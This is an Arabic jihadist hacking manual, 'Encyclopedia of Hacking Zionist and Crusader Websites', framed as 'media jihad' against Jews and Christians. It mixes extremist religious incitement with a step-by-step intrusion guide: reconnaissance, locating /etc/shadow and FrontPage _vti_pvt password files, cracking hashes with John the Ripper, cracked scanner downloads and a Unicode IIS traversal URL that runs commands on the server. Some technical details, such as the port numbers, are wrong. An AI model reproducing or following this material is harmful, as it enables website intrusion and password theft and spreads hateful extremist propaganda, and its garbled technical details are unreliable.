

دع القول ولنبدأ العمل !

# موسوعة

# اختراق المواقع

† الصهيونية والصليبية †

إعداد

إرهابي 007

كُتِبَ فِي الْفَيْدَةِ الْعِلْمِيَّةِ

## من الدستور الإلهي

**أَعُوذُ بِاللَّهِ مِنَ الشَّيْطَانِ الرَّجِيمِ  
بِسْمِ اللَّهِ الرَّحْمَنِ الرَّحِيمِ**

**وَخُذُوهُمْ وَأَخْصِرْهُمْ**

**وَاقْعُدُوا لَهُمْ لَكَّ مَرَصِدٍ !**

# إهداء

إلى فرسان الجهاد الإعلامي ...

إلى درر المنتديات وفخر شبكة المعلومات ...

إلى من استفاد منهم المجاهدين في سبيل الله وأنصار الجهاد ...

إلى من كانوا ولا زالوا يشكلون الدعامة الاستراتيجية اللوجيستية للإعلام  
الجهادي بفضل الله ...

إلى الأتقياء الأخفياء الأتقياء نحسبهم والله حسبيهم ...

إلى الأخوة الحبيبة إيهاب 007 ومحبّ الشيخية

وكل من سار على دربهم في العلم والعمل من أنصار الجهاد الأخفياء ...

نهدي هذا العمل ونسأل الله تعالى أن يجعل فيه قرة عين المجاهدين  
الإعلاميين وسوءة إعلام الصليبيين الكافرين وخزي كلابهم من المأجورين  
وأذنبهم من المرتدين !

بِسْمِ اللَّهِ الرَّحْمَنِ الرَّحِيمِ

الحمد لله معزّ الإسلام بنصره ، ومذلّ الشرك بقهره ، ومصرفّ الأمور بأمره ، ومستدرج الكافرين بمكره ، الذي قدرّ الأيام دولا بعدله ، وجعل العاقبة للمتقين بفضله ، والصلاة والسلام على من أعلى الله منار الإسلام بسيفه ، وعلى آله وصحبه ومن تبعهم بإحسان ، وبعد :

فالسّلام عليكم إخوة الإسلام في كل مكان ورحمة الله تعالى وبركاته

ونحمد الله سبحانه وتعالى أن وفق إخوانكم لآتمام إنجاز هذا العمل الجليل الذي قام عليه أخونا الفاضل إرهابي 007 حفظه الله ، وقد أفاضت بمجرّد الإعلان له كلاب الكفّار من اليهود وعبدّة الصليب ، وقد مضى على إعداد هذا العمل ونشره ما يقرب من عام ، وما أن تم نشره ، حتى اغتازت أجهزة الدول الغربية وإعلامهم المرجف ، وحيكت أحابيلهم كخيوط العنكبوت للحيلولة دون انتشاره ، فتمّ لهم - مؤقتا - ما أرادوا ، ولا يخفى على أحد صعوبة العمل الإعلامي الجهادي الذي لا يتجاسر عليه إلا من جعل الصدق والإخلاص أساسه ، واليقين والتوكل على الله مع الأخذ بالأسباب رائده ، وما بين ذلك وذاك ، مرّ الجهاد الإعلامي بمرحلة صعبة تمخّضت عنها مطاردات وملاحقات واعتقالات طالت العديد من أنصار الجهاد على شبكة المعلومات ، وما ذلك بالكثير بل هو من ضريبة هذا الطريق الجليل ، طريق الأنبياء وصفوة الأولياء ، وعثّ المسير ، كتيب المنظر ، مفروش الأشواك ، مرير المذاق ! ، ولكن حقّ لمن سار فيه واقتضى شروط وضوابط المسير أن ينال رضوان الله تعالى في الدارين بما أعده الله من مكافآت وكرامات في الدنيا وانتهاء بروضات الجنان ورفقة النبي العدنان عليه

الصلاة والسلام في الآخرة ، كيف لا ورب العزة جلّ جلاله وتعالى عظمته يقول : " أم حسبتم أن تدخلوا الجنة ولما يعلم الله الذين جاهدوا منكم ويعلم الصّابرين " [سورة آل عمران:143] ، وقول الله عزّ من قائل : " أم حسبتم أن تتركوا ولما يعلم الله الذين جاهدوا منكم ولم يتخذوا من دون الله ولا رسوله ولا المؤمنين وليجة ، والله خير بما تعملون " [سورة التوبة:16] ، وقول الله تعالى وتبارك : " أم حسبتم أن تدخلوا الجنة ولما يأتكم مثل الذين خلوا من قبلكم ، مستهم البأساء والضراء وزلزلوا حتى يقول الرسول والذين آمنوا معه متى نصر الله ؟ ، ألا إن نصر الله قريب " [سورة البقرة:214] ، وسيدنا ونبينا محمد صلى الله عليه وسلم يقول في الصحيح : " ألا إن سلعة الله غالية ، ألا إن سلعة الله غالية ، وإن من المعهود في مثل هذه الطريق وهذا المسير ، أن تكون العقبات والعوائق كثيرة ! ، فليس الأمر بالهين ، وإنه مما يكون أشد الوقع على أنصار الجهاد كثرة الإرجاف والتشكيك ممن باعوا أنفسهم وضمائرهم للشيطان وباتوا حاقدين ، وعلى أهل الجهاد وأنصار الجهاد مرجفين ومشككين ! ، وما يضّر ذلك من امتلاء قلبه بنور الوحيين وذاق حلاوة الإيمان ، ولكن الخلل الجلل كل الخلل فيمن يعقد على الأراجيف معاهد اليقين فيتكلم المتكلم منهم بالكلمة لا يلقي لها بالا ، يترتب عليها أمور منها : الهوي بالكلمة في قعر جهنم سبعين خريفا كما في الصحيح ، هذا في الأخرى ، أما في الدنيا فما ينعقد على مثل هذه الأراجيف من نفع الصليبيين ومن لفّ لفهم من أجهزة مباحث الخبائث في بلادنا ، والإضرار بإخوة كثر بسبب أراجيف وأغاليط لا أساس لها من الصحة ، والرائد لا يكذب أهله ! ، وأهم وأخطر معالم الإرجاف والتشكيك هو كثرة الإشاعات التي تنتشر

كالنار في الهشيمِ الييسِ ، كما هو غالب الحال في المنتديات ، ولا نبسط كثيرا ولكن نجمل محمودا ، والحرّ تكفيه الإشارة .

ونختم بما أسلفنا من القيام بالإعداد والاعتناء بهذه الموسوعة الموجزة الطيبة ، التي قام عليها وأعدّها أحنينا الفاضل إرهابي 007 حفظه الله وأدامه فخرا وذخرا لأمة الإسلام عامة وطلّيعتها المجاهدة خاصة ، وجعله الله مخرزا في عيون الكافرين وشوكة في حلوقهم وسعدانا في أكبادهم ، وأبقاه الله لما يسوء الكافرين ويخزي كلابهم من المرتدين ويفضح أذناهم من المنافقين أجمعين ، اللهم آمين .

قام على هذا العمل أكثر من أخ وقمنا بالاعتناء بما كتبه وانتقاه وأعدّه أحنينا الحبيب إرهابي 007 حفظه الله ، وقمنا بتجديد العديد من الروابط وجمع البرامج المطلوبة والمذكورة في الموسوعة تجدوها في المرفقات المضغوطة ، وقمنا بتنقيح ما فيها لغويا ، فالجمع والانتقاء والاعداد بأكثر من لهجة ، فتم توحيد اللهجة للعربية الفصيحة ، ونسأل الله أن يكتب لنا قمنا به القبول ، وكما سألناه الصديق والإخلاص في القول والعمل ، نسأله البراءة ! فنبراً إلى الله من كل من تسوّل له نفسه أن يضرّ بهذا العمل الإسلام والمسلمين والجهاد والمجاهدين ، فنسأل الله أن تشلّ الأيدي وتقطّع ، وتصمّ الآذان وتطرش ، وتعمى العيون ويختم على قلوب كل من تسوّل له نفسه الإضرار بالمسلمين ، والله يحفظ أحنينا إرهابي 007 في خير وعافية ويلهمه رشده وتمام النصره وكمال الجهاد في سبيل الله وسائر إخواننا المجاهدين الإعلاميين وكافة المجاهدين الميدانيين وأنصارهم من صلحت نياتهم واستوت سريرتهم والظواهر ، اللهم آمين .

فعليه أخي الكريم ابدأ التطبيق أولا بأول مستعينا بالله ومتوكلا على الله وهو حسبنا ونعم الوكيل ، وكما قلنا ونكرّر نبراً إلى الله سبحانه وتعالى من كل من

تسوّّل له نفسه الإضرار بمسلم على هذه البسيطة وإنما عملنا هو جزء من جهاد الأمة ضد أعدائها وأهم جبهة تحتاج إلى العمل والنصرة والمثابرة والمصابرة هي الجبهة الإعلامية وعليه ننشر هذا العمل ونسأل الله القبول .

اللهم سدّد رمي المجاهدين وثبت أقدامهم واربط على قلوبهم ، اللهم وأسـيرـاتنا وأسـرانا الأحرار في سجون القهر الصليبي الطاغوتي ، من لهم غير رحمتك وباب فرجك يا أرحم الراحمين كن لهم أجمعين ، اللهم ونسألك الصدق والإخلاص في القول والعمل والاعتقاد ، اللهم ونسألك طول عمر وحسن عمل وجهادا في سبيلك وعظم نكاية وتنكيل بأعدائك وأعداء رسولك - عليه الصلاة والسلام - وأعداء المؤمنين ، ونسألك بعد ذلك حسن ختام بشهادة امتياز في سبيلك مقبلين غير مدبرين مع مرتبة الشرف الأولى ورفقة النبيين والصدّيقين والشهداء والصالحين وحسن أولئك رفيقا ، اللهم استجب اللهم آمين .

بورك فيكم أجمعين ودمتم فخرا لكل مكرمة وذخرا لكل ملحمة

عن جميع الإخوة الأفاضل الكرام - الذين رفضوا نشر أسمائهم وكفاهم شرفا وفخرا أن الله يعرفهم ويجزيهم عن أمتنا الحبيبة خير الجزاء -

أخوكم الفقير أصغر القوم وأجهلهم

السيف الأثري

كان الله له وإخوانه وللمسلمين

بِسْمِ اللَّهِ الرَّحْمَنِ الرَّحِيمِ

رَبِّ يَسِّرْ يَا كَرِيمَ

دَعِ الْقَوْلَ وَلِنَبْدَأِ الْعَمَلَ !

## موسوعة اختراق المواقع الصهيونية والصليبية

أخي الكريم ، السلام عليكم ورحمة الله تعالى وبركاته .

أولاً عليك تعلم أموراً منها :

لا تحسبنّ المجد تمراً أنت آكله \*\*\* لن تبلغ المجد حتى تلعق الصبرا

وعليه فلن تصير "هاكراً" محترفاً فيما بين ليلة وضحاها .

وأن "الهاكر" الحقيقي لا يستعمل برامج صنعها "هاكر" آخر بل "الهاكر" الحقيقي هو الذي يبتكر أشياء جديدة ! ، وذلك لأن الإنجاز الذي يقوم به "الهاكر" أيّاً كان تنسب لصاحب البرنامج ! ، كما أن ما يقوم به "الهاكر" الآخر يصبح معروفاً حينما يصل إليك ، أضف إلى ذلك أن برنامج "الهاكر" قد يحتوي على ثغرات تمكّن صانع برنامج "الهاكر" الذي تستخدمه من الدخول على جهازك وعمل "هكر" عليه ! .

## أساسيات وتعريفات :

**1 ( تيل - نيت (Telnet) :** وهو برنامج صغير موجود في "الويندوز" .

أي إن باستطاعة هذا البرنامج الإتصال بالـ "سيرفر" أو الخادم وإجراء بعض العمليات كل حسب مستواها وحالتها . يستخدمه "الهاكرز" غالبا لمعرفة نظام تشغيل الموقع و"السيرفر" التابع له ، وللإتصال بالـ "سيرفر" عبر "بورت" معين وخصوصا "بورت الإيف تي بي" للدخول إلى الموقع بطريقة خفية لعرض ملفات الموقع وسحب ملف الباسوورد أو غيره من البيانات .

لاستخدام البرنامج اذهب إلى :

**Start ==> Run ==> Telnet**

وستظهر شاشة التيل - نت .

وهناك برنامج مشابه له فيه خاصية التشفير و يدعى SSH وله ذات الاستخدامات تقريبا ، ولكن كل المعلومات المنقولة عن طريقه تكون مشفرة ، والله أعلم .

**2) برامج المسح (سكانر) SCANNER :** وهي برامج مهمتها الأساسية مسح المواقع وكشف ثغراتها إن وجدت ، فهي سريعة ، كما أنها تملك قاعدة بيانات واسعة وكبيرة ، وتحتوي على الثغرات أو "الإكسبلويت" (نوع خاص من الثغرات) التي يتم تطبيقها على الموقع لرؤية فيما إذا كان "السيرفر" يعاني من إحدى هذه الثغرات أم لا .

ومن أمثلة هذه البرامج : برنامج Shadow Security Scanner وبرنامج Stealth وبرنامج Omran Fast .

و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو "سيرفر" معين مثل البرامج المختصة بالـ "سكان" على "سيرفرات" الـ IIS (سيرفر من صناعة مايكروسوفت) ، أو على ثغرات "السي جي آي" CGI فقط ومنها برامج المسح لجميع أنواع السيرفرات ، والله أعلم .

**3) "إكسبلويت" Exploits :** هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان URL وتقوم هذه "الإكسبلويتات" بعرض ملفات الموقع و تقــــــــوم بعضــــــــها بالدخول إلى السيرفر والتجول فيه ، كما توجد "إكسبلويتات" تقوم بشن هجوم على "بورت" معين في "السيرفر" لعمل "كراش" له ، وهذا ما يسمى بـ Buffer Over Flow Exploits .

هناك أنواع من "الإكسبلويت" ، فمنها

## CGI Exploits CGI Bugs Unicode's Exploits Buffer over Flow Exploits PHP Exploits DOS Exploits

والتي تقوم بعملية حجب الخدمة للـ "سيرفر" إن وجد فيها الثغرة المطلوبة لهذا الهجوم و إن لم يكن على "السيرفر" أي "فايروول" **Fire Wall** .

وهناك بعض "الإكسبلويتات" المكتوبة بلغة السي ويكون امتدادها (**\*\*\*.C**) ، هذه "الإكسبلويتات" بالذات تحتاج إلى "كومبايلر" أو برنامجا لترجمتها وتحويلها إلى "إكسبلويت" تنفيذي عادي يستخدم من خلال المتصفح ، ولتحويل "الإكسبلويت" المكتوب بلغة السي هذه إلى برنامجا تنفيذيا ، نحتاج إما إلى نظام التشغيل "لينوكس" أو "يونكس" ، أو إلى أي "كومبايلر" يعمل ضمن نظام التشغيل ويندوز .

أشهر هذه "الكومبايلرات" (الترجمات أو المحولات) برنامج اسمه **Borland C++ Compiler** وهو يعمل تحت نظام التشغيل "ويندوز" كما ذكرنا سابقا .

4) **الجدار الناري (Firewall)** : هي برامج تستخدمها "السيرفرات" لحمايةها من الولوج غير الشرعي لنظام ملفاتها من قبل المتطفلين فهي تمثل الحماية للـ "سيرفر" بالطبع ، ولكني أنه إلى أن "الفايرووللات" المستخدمة لحماية السيرفرات (المواقع) تختلف عن تلك التي تستخدم لحماية الأجهزة .

5) **ملف "الباسورد" المظلل (Shadowed Password)** : والذي يكون فيه الباسورد على شكل \* أو X ، حيث أن ملف "الباسورد" العادي تكون الأسطر فيه بهذا الشكل :

Username: passwd: UID: GID: full name:  
directory: shell

حيث أنك تجد "الباسورد" المشفر بعد الاسم و النقطتين :

أما في ملف "الباسورد" إذا كان مظلا فإنه شكله يصير كالتالي :

Username: x: 503: 100: Full Name:  
/home/username: /bin/sh

حيث كما هو واضح "الباسورد" قد تم تغييره برمز X مكانه .

وفي حالة أن ملف "الباسوورد" مظلّل فبإمكانك أن تجد ملف "باسورد" آخر يحوي على "الباسوورد" المشفر ويسمى **Shadow file** وتجده في المكان التالي :

/etc/shadow

ويكون شكل الأسطر في الملف على هذا الشكل :

Username: passwd: last: may: must: warn:  
expire: disable: reserved

فيمكنك نسخ "الباسوورد" المشفر من هنا ووضعها في الملف المظلّل حتى يصبح الملف المظلّل تماما كملف "الباسوورد" العادي .

**6 ( الوضع المتخفي Anonymous )** هي الوضعية الخفية والمجهولة التي تدخل فيها إلى الموقع المراد اختراقه ! . هناك خاصية في برامج "الإف تي بي" بنفس الاسم ، تستطيع أن تستخدمها في الدخول المجهول إلى "السيرفر" وسحب الملفات منه . (إذا كان "السيرفر" يسمح بهذا) .

**7 ( الثغرات غير المحصّنة Vulnerabilities )** أي الثغرات أو مواضع الضعف غير المحصّنة أو القابلة للعطب والتي يعاني منها "السيرفر" والتي قد تشكل خطرا أمنيا عليه مما يؤدي إلى استغلالها من قبل "الهاكرز" في مهاجمة "السيرفر" واختراقه أو تدميره .

**Vulnerable** أي ثغرة أو بالأصح موضع الضعف والمكان غير المؤمن بشكل سليم ، وتكثر هذه الكلمة في القوائم البريدية للمواقع المهمة بالـ"سيكيوريتي" وأمن الشبكات وغيرها كالقائمة البريدية الموجودة في موقع **Security Focus**

<http://www.securityfocus.com>

أو بووك تراك

<http://www.securityfocus.com/archive/1>

أو غيرها .

**8** ( ملف "الباسورد" **Password File** : هو الملف الذي يحتوي على باسورد الرووت و "باسوردات" الأشخاص المصرح لهم بالدخول إلى السيرفر ، باسورد الموقع موجود في نفس الملف طبعاً .

وهنا يجب ملاحظة أن جميع "الباسوردات" مشفرة في هذا الملف .

**9** ( الجذر **Root** : وهو المستخدم الجذري والرئيسي للنظام ، له كل الصلاحيات في التعامل مع ملفات الموقع و"السيرفر" ، من إزالة أو إضافة أو تعديل للملفات . (وهو ما يقابل الآدمين Administrator في "الويندوز" ) .

غالباً ما يكون باسوورد "الرووت" هو باسوورد الموقع نفسه في المواقع التي تعمل ضمن نظام التشغيل "لينوكس" أو "يونكس" أو "سولاري" أو "فري بي أس دي" أو غيرها .

**10** ( "السيرفر" **Server** ) : هو الجهاز المستضيف للموقع ، إذ إن كل ملفات الموقع توضع فيه فهو جهاز كمبيوتر عادي كغيره من الأجهزة لكنه ذو إمكانيات عالية : ككبير حجم القرص الصلب وسرعته الهائلة ، وهو متصل بالإنترنت 24 ساعة ، وهذا هو سبب كون المواقع شغالة وفاعلة 24 على الإنترنت . قد يملك ويستضيف "السيرفر" أكثر من موقع واحد ، وهذا يعتمد من "سيرفر" لآخر ومن شركة لأخرى .

ضربة "الهاكرز" طبعاً هي اختراق "السيرفر" الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي تندرج تحته مما يؤدي إما إلى تدميرها أو العبث في ملفاتهما أو تشويه واجهتها أو سرقة بياناتهما وتدميرها أو مسحها من الشبكة تماماً ، وهذا ما يحدث للمواقع اليهودية وبكثرة ولله الحمد فجزاكم الله خيراً أيها المجاهدون .

**11** ( "بوفر أوفر فلو" **Buffer over Flow** ) : وهي نوع من أنواع "الإكسبلوينات" التي تستعمل لشن هجوم الطفح على نقطة معينة من "السيرفر" (بورت من السيرفر) مثل الهجوم على "بورت" الإيف تي بي أو غيره لأجل إضعاف اتصال "السيرفر" وفصل اتصاله بهذا البورت وإلغاء الرقعة

(الحاجز) الموجودة بها كي يتم استغلالها مجددا - بعد عمل "الكراش" لها طبعاً - ، ويتم استغلالها في معاودة الاتصال بها وبسهولة ودون وجود أي رقع أو حواجز وسحب البيانات منها (بعد عمل "كراش" للحاجز يصبح الدخول إلى "السيرفر" سهل و دون حواجز) ، وهي شبيهة نوعاً ما بعملية حجب الخدمة إذ أنها تقوم بعملية "أوفر لود" على جزء مركّز من "السيرفر" .

**12 ( بوكس BOX )** : كثير من "الهاكرز" يحبّون أن يطلقوا على كل من الـ pc , servers , supercomputers كلمة BOX .

**13 ( Super User )** : النّظام الذي سوف نقوم باختراقه - بعون الله وحوله وقوته - يحتوي عادة على العديد من "اليوزرز" والمستخدمين ذوي الصلاحيّات الكاملة أو شبه الكاملة يسمّون super user وهو يكون "رووت" وهو "الأدمين" أو المدير على النّظام .

**14 ( "شيل أكاونت" Shell Account )** : الشيل أكاونت هو عبارة عن خدمة ، حيث يمكنك من خلالها التحكم في جهاز من بعيد ، وهذا الجهاز عليه نظام "اليونيكس" ، وتستطيع الدخول على "الشيل أكاونت" shell account عن طريق الـ "تيل نت" Telnet أو SSH سالفه الذكر .

**15 ( الملقّات Web Servers )** : أشهرها اثنين :

IIS: من "مايكروسوفت" وهذه مليئة بالثغرات (ومواقعها مقفلة الثغرات قليلة).

Apache: من مجموعة مبرمجين متوزعين في أنحاء العالم واختراقها شبه صعب! وهو ملقّم مفتوح المصدر ودائم التطوير!

**16** ( الأنظمة **Systems** : هناك أنظمة كثيرة منها :

SunOS

FreeBSD

OpenBSD

NetBSD

AIX

IRIX

Windows/NT/2000/xp

Linux بأنواعه الكثيرة مثل الردهات والفيدوره وغيرها.

**17** ( "اللينوكس" **Linux** : له ستة مجلدات أساسية وهي :

Bin خاص بالملفات الثنائية أي التي تشغل النظام.

Etc ملفات إدارة النظام ومن ضمنها "الرووت" اللي هو حساب مدير النظام أو password (وهذا المجلد مهماً جداً دراسته ومحتوياته المهمة لعملية الإختراق بإذن الله).

Dev ملفات الأجهزة .

Lib مكتبات الربط الديناميكي التي تساعد النظام في التشغيل.

Tmp الملفات المؤقتة أو غير الثابتة.

Usr أسماء المستخدمين وكلمات السرّ للذين لهم حسابات في النظام (أيضاً دراسة هذا المجلد مهمة).

## 18 ) أوامر "الإف تي بي" FTP :

أ) Pwd : لكي تعرف ما يحتويه "الهارد ديسك".

ب) Cd : لاقتحام مجلد ، مثال : Cd black ، في هذا المثال قمت باقتحام مجلد المسمى "بلاك" .

ج) Is : لكي يتضح لك محتوى المجلد أو "الهارد ديسك" (مثل أمر Dir في "الدوس" ).

د) Get : لكي تحمل إلى جهازك الملف المراد ، مثال :

Get black.exe

حيث إن هذا الأمر يقوم بتحميل الملف **black.exe** من السيرفر إلى كمبيوترك في المجلد الذي كنت فيه قبل كتابة أمر الـ **FTP** (عادةً في سطح المكتب).

(هـ) **Put** : العملية العكسية لـ **Get** ، يعني أن تأخذ ملف من عندك وتضعه في جهاز الضحية ، مثال :  
**Put black.exe**  
(هنا يجب أن يكون الملف موجود في المجلد الذي كنت فيه قبل أمر الـ **FTP** وعادةً في سطح المكتب).

(و) **Close** : لقطع الاتصال مع الضحية .

يمكنك تشغيل "إف تي بي" من "الويندوز" عن طريق :

**START ==> RUN ==> ftp -n hostname**

**19** ( بورتات البرامج :

7 Echo  
21 Telnet  
23 ftp  
25 SMTP  
80 http  
110 POP

## 20 ( ملاحظة رسائل لأخطاء معينة :

ومن أشهرها الرسالة **Error 404** وهي تظهر عند طلب ملف غير موجود في الموقع وعند ظهور هذه الصفحة انظر إلى أسفل الصفحة وقد تجد معلومات مثل : إصدار ملقم "الويب" ، وهذه معلومات غير مضرّة أو خطيرة لكنها تفيد في عملية الاختراق بإذن الله .

## 21 ( أماكن تواجد ملف "باسورد" المواقع حسب نظام التشغيل :

أ) SunOS 5.0 : etc/shadow أو etc/passwd

ب) Linux : etc/shadow أو etc/passwd

ج) BSD4.3 –RENO : Passwd : etc/master.

د) AIX : etc/security/passwd

هـ) Windows NT : scripts/passwd

## 22 ( برنامج **John the Ripper** :

أحد أفضل البرامج لكسر كلمات السرّ التي يحصل عليها المخترقون من الأنظمة (nix\*) "وتعني لينوكس أو يونكس". وهذه الأنظمة - وأخص الإصدارات الحديثة - توفر نظام حماية إضافي لملف (PASSWORD) ، بأن يكون

مظلل وعلى المخترق الحصول على ملف (SHADOW) لكي يحصل على ملف كلمات السر مشفرة ومن ثم يقوم بكسر هذا التشفير . هذه هي الوظيفة الأساسية وأعتبرها من أهم الخطوات في اختراق الخوادم لأنها تعطيك المفتاح بعون الله .

## طريقة الاختراق :

أولاً قبل أن نبدأ بهذا القسم ، عليك أخي الكريم أن تعلم أن ما نشرحه هنا ما هو إلا إحدى طرق الاختراق وقد تصبح هذه الطرق قديمة بعد مدة ! ، ولكن ما يهم أن تعلم كيف تتم عملية الاختراق بشكل عام ، وأن تعلم كيف يمكنك البحث عن الثغرات في الأنظمة وكيفية استغلالها بما يلي أهدافنا النبيلة بعون الله.

**أول خطوة في الاختراق هي أخذ المعلومات ! ، يعني أن نعرف الموقع ما هو الملقم الذي يشتغل عليه والنظام والخدمات التي يدعمها ونحو ذلك .**

حسنا الآن عندنا موقع فكيف نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها ، تتم هذه العملية عبر إدخال اسم الموقع في أحد هذه المواقع والتي تعطينا معلومات مختصرة عن نوع نظام التشغيل الذي على الموقع ونوع الملقم ونحو ذلك .

وهذه المواقع هي :

<http://www.netcraft.net/>

<http://www.whois.com/>

ملاحظة مهمة : نكتب عنوان الموقع من غير هذه الرموز <http://> ومن غير  
الشرطة المائلة / التي في الأخير !

و يمكن أيضا الحصول على نفس المعلومات عن طريق محاولة الدخول على الموقع  
عبر برنامج تيل - نت [Telnet](http://).

أم مثال على ملقمات IIS :

إذا أدخلنا اسم الموقع مع [netcraft](http://)  
سوف يظهر لنا التالي :

This site [http://www.\\*\\*\\*.com](http://www.***.com) is running  
Microsoft - Windows 2000 on IIS/5.0

طيب الآن عرفنا معلومتين مهمتين :

أولا أن الموقع شغال على الملقم IIS5.0 .  
وآخرا أن النظام المستخدم هو "ويندوز" 2000 .

ثم نفعل التالي :

1 ( أول شيء نجرب ثغرات IIS5.0 عليه ، طيب الآن يوجد حاجة تسمى "يوني كود" ، هذه تحترق فيها عن طريق المتصفح وما تتماشى إلا مع ملقّمات IIS وهي عبارة عن عناوين طويلة تضعها بعد عنوان الموقع .

2 ( إذا لم ينفذ شيء ننظر في ثغرات نظام "ويندوز" 2000 طيب لنضع افتراضاً أنه لم يظهر فيها ثغرات!؟

3 ( ننظر في محتويات الموقع نفسه ! ، نرى إن كان عنده سجل زوّار أو منتدى أو نحو ذلك ... (هذا مثال على طريقة اختيار أسلوب الهجوم حيث أنه بناء على معلومات الموقع نجرب الثغرات التي يمكن أن نهاجم بها الموقع بعون الله).

(ب) مثال على ملقّمات أباتشي :

ناخذ مثال موقع أرانك

<http://www.arank.com/>

لو حللناه بالنيت كرافت سوف نرى النتيجة التالية :

The site <http://www.arank.com/> is running  
Apache/1.3.20 (UNIX) mod\_gzip/1.3.19.1a

mod\_perl/1.26 mod\_bwlimited/0.8 PHP/4.0.6  
mod\_log\_bytes/0.3 FrontPage/5.0.2.2510  
mod\_ssl/2.8.4 OpenSSL/0.9.6 on Linux

هنا يهمننا ثلاث أمور :

1 ( الملقّم وهو apache 1.3.20 : أول شيء أباتشي من الملقّمات  
صعبة الإختراق - وليست مستحيلة - إلا بعض الإصدارات منها فنضع هذه  
جنباً .

2 ( ودعم فرونت بيج FrontPage/5.0.2.2510 وهذه مليئة  
بالثغرات .

3 ( النّظام وهو Linux (إختراق نظام لينوكس يعد أصعب نوعاً ما من  
غيره والله أعلم) .

الآن سوف نقوم بشرح الثغرات التي في دعم فرونت بيج :

دعم الفرونت بيج كما أسلفنا مليء بالثغرات ، وثغراته قوية وكثيرة تقريبا .  
منها مجلدات \_vti\_pvt و private ، وهذه التي نحتاجها وغيرها غالباً  
ما لا فائدة فيها ، وداخل المجلدين المذكورين سوف نجد أربع ملفات مهمة  
وهي :

service.pwd  
users.pwd  
authors.pwd  
adminstators.pwd

ويعتبر هذا أخطر ملف ، فلو قدرنا مثلا نزل واحد من هذه الملفات (مع ملاحظة أن هذه الثغرة موجودة في 70% من المواقع الموجودة والمنشرة على الشبكة ) ، فلو أنزلناها نفتحها بالمفكرة ونجد هذا السطر على سبيل المثال :

Goodyco: CaIXS8USI4TGM

وهذه من موقع ما

[http://www.\\*\\*\\*.com/\\_vti\\_pvt/service.pwd](http://www.***.com/_vti_pvt/service.pwd)

حسننا الآن عرفنا أن الـ Goodyco هو "اليوزر" ، والباسوورد مشفرّ والذي هو CaIXS8USI4TGM ، فكيف نفك التشفير!؟

نقوم بفك التشفير عن طريق برنامج يسمى john the ripper (شرح استخدامه موجود في آخر موضوع في هذا المجلد إن شاء الله .

الآن نذهب إلى الفقرة الثالثة والتي هي النظام ، وكما علمنا النظام هو "لينوكس" ولكن أي إصدار منها؟! هناك "ريد هات" و "ماندريك" وهناك منه إصدارات كثيرة وثغرات أكثر ولكن هنا سوف تواجهك مشكلتين

الأولى شيء معرفة النظام ، وتستطيع استخراجها من قائمة ابدأ وتشغيل الـ  
Telnet ، واكتب عنوان الموقع فيظهر لك النظام من فوق : نوعه وإصدارته  
، والمشكلة الثانية يجب أن يكون عندك "الينوكس" أصلاً لأن الثغرات هي بلغة  
الـ C والتي لا تعمل إلا على "اللينوكس" فقط .

## الخلاصة :

إذن ، يتضح لنا مما سبق أن عملية الاختراق تتكون من قسمين : الأول  
جمع المعلومات عن المستهدف ومن ثم الهجوم بناء على هذه المعلومات .

ومما سبق نكون قد أنهينا مرحلة جمع المعلومات ويتبقى علينا مرحلة استغلال  
الثغرات بناء على المعلومات للهجوم على الضحية ! ، وهناك عدة مواقع تقوم  
وبشكل دوري بعرض الثغرات على حسب الملقم ونظام التشغيل وغيره ، وكل  
ما علينا هو قراءة هذه الثغرات ومحاولة استغلالها بالشكل المطلوب بعون الله .

ومن المواقع التي تقدم هذه الخدمة :

<http://www.ussrback.com/>

وهذا الموقع خطير جداً ، تذهب للـ EXPLOITS الموجودة على اليسار ، وتختار أول اختيار ، هنا ثغرات جميع الأنظمة من  
"الينوكس" و"ويندوز" ونحوها .. ومتنوعة من C أو Perl أو "يوني كود".

ومن هذه المواقع أيضا :

<http://neworder.box.sk>

هذا الموقع مفيد جداً ، تكتب مثلا فوق أعلاه في المربع الموجود على اليسار IIS أو apache أو موقع منتدى وإصدارته أو أي برنامج ويظهر لك ثغراته .

مواقع أرشيفية للثغرات المختلفة :

[www.securiteam.com/exploits/archive.html](http://www.securiteam.com/exploits/archive.html)

[www.ussrback.com](http://www.ussrback.com)

[www.secureroot.com](http://www.secureroot.com)

<http://www.rootshell.com>

[www.secureroot.com/category/exploits](http://www.secureroot.com/category/exploits)

وهناك أيضا برامج مهمتها البحث عن الثغرات في موقع ما وتقديمها لك على طبق من ذهب وهذه من أفضل برامج البحث عن الثغرات ونسأل الله تمام مقاصدنا لكل خير يرضيه سبحانه :

## 1 ( برنامج Shadow Security Scanner )

لتحميل البرنامج على هذا الرابط ( وتجده أيضا في المرفقات المضغوطة مع  
الشارخ "الكراك" )

<http://mirror1.safety-lab.com/SSS.exe>

تحميل الكراك :

[http://www.aldamar.net/index\\_files/license.zip](http://www.aldamar.net/index_files/license.zip)

تحميل ملف التعريب :

[http://www.aldamar.net/index\\_files/ssslanguage.zip](http://www.aldamar.net/index_files/ssslanguage.zip)

وصلة شرح البرنامج :

[http://www.aldamar.net/index\\_files/ssslanguage.zip](http://www.aldamar.net/index_files/ssslanguage.zip)

برنامج ذو شهرة عالية وفعالية كبيرة في فحص المواقع من المنافذ والثغرات ،  
بعد تحميل البرنامج يتم تنزيله وتشغيله ، فيطلب أن يعمل تحديث فتوافق ثم  
يطلق البرنامج ، وكل ما عليك هو صناعة ملف Licence.key من  
الكراك ووضعها في مجلد البرنامج ثم تشغيل البرنامج فيكتشف الملف ويسألك

هل تريد التسجيل فتجيب بـ Done وشرح البرنامج متوفر - بفضل الله -  
أيضا في المرفقات ولله الحمد والمنة .

## 2 ( برنامج CGI Scanner

برنامج متخصص في البحث عن ثغرات Cgi وهو الأفضل في عمل ذلك ،  
والله أعلم ، وتجد البرنامج متوفرا بحمد الله في المرفقات .

## 3 ( برنامج UniScan

تجده هنا على هذا الرابط ( وتجده أيضا في المرفقات المضغوطة )

<http://online.securityfocus.com/data/tools/uniscan.zip>

وهذا البرنامج كسابقه ولكن هذا البرنامج خاص بفحص ثغرات  
. Unicode

حتى هذه النقطة نكون قد انتهينا من أساليب اكتشاف الثغرات في المواقع  
والخطوة التالية الآن هي كيفية استغلال هذه الثغرات التي قمنا باكتشافها .

طريقة تنفيذ الثغرات :

أ) مكان تنفيذ الثغرات :

***http://www.xxxxx.com/scripts/..&Aa...exe?/c+dir  
+c:|***

بعد العنوان الرئيسي دوت كوم !

